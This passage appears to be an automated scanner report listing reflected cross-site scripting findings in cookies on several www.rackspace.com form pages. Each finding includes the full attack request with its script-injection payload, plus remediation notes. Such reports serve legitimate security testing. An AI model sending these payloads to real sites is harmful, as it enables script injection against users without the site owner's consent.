Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dc6fc3"><script>alert(1)</script>e0a31e74b6e; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fca4"%3balert(1)//e66251bcdba was submitted in the chatslider cookie. This input was echoed as 4fca4";alert(1)//e66251bcdba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /crossdomain.xml HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D4fca4"%3balert(1)//e66251bcdba; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38f54"%3balert(1)//15dfd72b670 was submitted in the IS_UASrackuid cookie. This input was echoed as 38f54";alert(1)//15dfd72b670 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/contactsales.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f838f54"%3balert(1)//15dfd72b670; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54802"><script>alert(1)</script>920b026e857 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /forms/contactsales.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f854802"><script>alert(1)</script>920b026e857; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4290f"><script>alert(1)</script>133c509e646 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /forms/contactsales.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D4290f"><script>alert(1)</script>133c509e646; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7f5c"%3balert(1)//af1a8175718 was submitted in the chatslider cookie. This input was echoed as d7f5c";alert(1)//af1a8175718 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/contactsales.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dd7f5c"%3balert(1)//af1a8175718; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5786"><script>alert(1)</script>4172314091f was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /forms/contactsalesconfirmation.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8c5786"><script>alert(1)</script>4172314091f; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b92f"%3balert(1)//f0e690efb61 was submitted in the IS_UASrackuid cookie. This input was echoed as 7b92f";alert(1)//f0e690efb61 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/contactsalesconfirmation.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f87b92f"%3balert(1)//f0e690efb61; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:52:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 34045
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c197a"><script>alert(1)</script>206871140ef was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /forms/contactsalesconfirmation.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dc197a"><script>alert(1)</script>206871140ef; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aaca7"%3balert(1)//0ed5bec6a4 was submitted in the chatslider cookie. This input was echoed as aaca7";alert(1)//0ed5bec6a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/contactsalesconfirmation.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Daaca7"%3balert(1)//0ed5bec6a4; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12115"><script>alert(1)</script>a330925b86 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /forms/logorequest.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f812115"><script>alert(1)</script>a330925b86; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba7f6"%3balert(1)//17cf15cfc was submitted in the IS_UASrackuid cookie. This input was echoed as ba7f6";alert(1)//17cf15cfc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/logorequest.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8ba7f6"%3balert(1)//17cf15cfc; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; 